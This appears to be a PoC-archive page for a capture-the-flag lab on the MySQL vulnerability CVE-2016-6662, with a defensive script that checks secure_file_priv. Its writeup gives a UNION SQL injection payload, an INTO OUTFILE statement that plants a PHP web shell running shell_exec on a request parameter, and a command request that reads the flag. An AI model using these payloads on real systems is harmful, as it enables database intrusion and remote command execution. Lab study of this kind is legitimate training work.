Related vulnerability
Title:
Oracle MySQL remote code execution / privilege escalation vulnerability
(CVE-2016-6662)
Description: Oracle MySQL is an open-source relational database management system from Oracle Corporation (USA). The system is known for high performance, low cost and good reliability. A remote code execution vulnerability exists in the Oracle MySQL configuration file (my.cnf). An attacker (local or remote) with authenticated access to the MySQL database (over a network connection or through a web interface such as phpMyAdmin), or via SQL injection, can exploit this vulnerability to inject malicious database configuration into the configuration file, leading to arbitrary code execution with root privileges and complete control of the affected server. The following versions are affected: Oracle MySQL 5.5.52 and earlier, 5.6.x
Description
This lab is dedicated to learning penetration testing skills with CVE-2016-6662: MySQL Remote Root Code Execution
Introduction
## About this lab
This lab is dedicated to learning penetration testing skills through *CVE-2016-6662: MySQL Remote Root Code Execution*
### Core logic:
The problem with this CVE lies in the `secure_file_priv` variable, which was added in MySQL version 5.5.53.
It was supposed to add a layer of security, since it restricts the ability to read or write files anywhere on the server, which happened a lot back then.
However, from the early releases of version 5.6 up to version 5.7.6, the default value of `secure_file_priv` is null, so nothing changes unless the database admin takes extra notice at that point.
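As an added example (not part of the lab or its README), the following Python script classifies the `secure_file_priv` value found in the `[mysqld]` section of a `my.cnf`, separating the unrestricted setting this lab depends on from the `NULL` and directory-restricted forms. The config fragments are constructed, and the script assumes a single file (`!include` / `!includedir` lines are skipped, not followed).

```python
import configparser

# Constructed sample my.cnf fragments (not taken from the lab's own files).
WEAK_CNF = """
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=
"""

HARDENED_CNF = """
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=/var/lib/mysql-files
"""


def secure_file_priv_status(cnf_text: str) -> str:
    """Classify secure_file_priv in the [mysqld] section of a my.cnf.

    Returns:
      'unrestricted'      missing or empty: a FILE-privileged account can
                          SELECT ... INTO OUTFILE anywhere the server process
                          can write (the condition this lab relies on)
      'disabled'          NULL: server-side file import/export is turned off
      'restricted:<dir>'  file I/O confined to that directory
    Assumption: single file; '!include' / '!includedir' lines are skipped.
    """
    lines = [ln for ln in cnf_text.splitlines() if not ln.lstrip().startswith("!")]
    parser = configparser.ConfigParser(allow_no_value=True, strict=False,
                                       interpolation=None)
    parser.read_string("\n".join(lines))
    if not parser.has_section("mysqld"):
        return "unrestricted"
    value = None
    # MySQL treats '-' and '_' in option names as equivalent; last one wins.
    for name in ("secure_file_priv", "secure-file-priv"):
        if parser.has_option("mysqld", name):
            value = parser.get("mysqld", name)
    if value is None or value.strip().strip("\"'") == "":
        return "unrestricted"
    value = value.strip().strip("\"'")
    if value.upper() == "NULL":
        return "disabled"
    return "restricted:" + value


if __name__ == "__main__":
    for label, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(f"{label}: secure_file_priv is {secure_file_priv_status(cnf)}")
```

On a running server the effective value (which may differ from the file if it was overridden on the command line) is shown by `SHOW VARIABLES LIKE 'secure_file_priv';`.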
### Writeup:
1. The first part of the flag is inside the database, you will get it with this payload: `1 UNION SELECT NULL, flag from flags`
2. The second part of the flag is located in the root folder of the server. You first create a PHP web shell with this:
```sql
select '<?php $output=shell_exec($_GET["cmd"]);
echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
```
This creates a PHP file whose `cmd` parameter takes its value from the request and passes it to `shell_exec()`, a PHP function that executes shell commands.
3. With that parameter, you read the flag with: `/shell.php?cmd=cat /flag.txt`.
4. You get the flag.
File snapshot
[4.0K] /data/pocs/7fb39e7a83f8a7c127d59b1d836b9b8e3430020d
├── [4.0K] db
│ ├── [ 187] Dockerfile
│ └── [1.0K] dump.sql
├── [ 777] docker-compose.yaml
├── [ 108] Dockerfile
├── [ 63] flag.txt
├── [1.2K] README.md
└── [4.0K] src
├── [1.1K] ajax.php
├── [4.0K] css
│ ├── [103K] bootstrap.min.css
│ ├── [6.8K] magnific-popup.css
│ └── [4.7K] templatemo-style.css
├── [4.0K] img
│ ├── [280K] neaty-01.jpg
│ ├── [124K] neaty-02.jpg
│ ├── [118K] neaty-03.jpg
│ ├── [ 89K] neaty-04.jpg
│ ├── [ 72K] neaty-05.jpg
│ ├── [184K] neaty-06.jpg
│ ├── [109K] neaty-07.jpg
│ ├── [ 80K] neaty-08.jpg
│ ├── [123K] neaty-09.jpg
│ ├── [ 95K] neaty-10.jpg
│ ├── [178K] neaty-11.jpg
│ ├── [173K] neaty-12.jpg
│ ├── [140K] neaty-13.jpg
│ ├── [129K] neaty-14.jpg
│ └── [4.2K] tm-neaty-logo.png
├── [ 15K] index.html
└── [4.0K] js
├── [ 94K] jquery-1.11.3.min.js
├── [ 20K] jquery.magnific-popup.min.js
├── [2.5K] jquery.singlePageNav.min.js
└── [2.0K] main.js
5 directories, 30 files
Notes
1. It is recommended to access the POC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.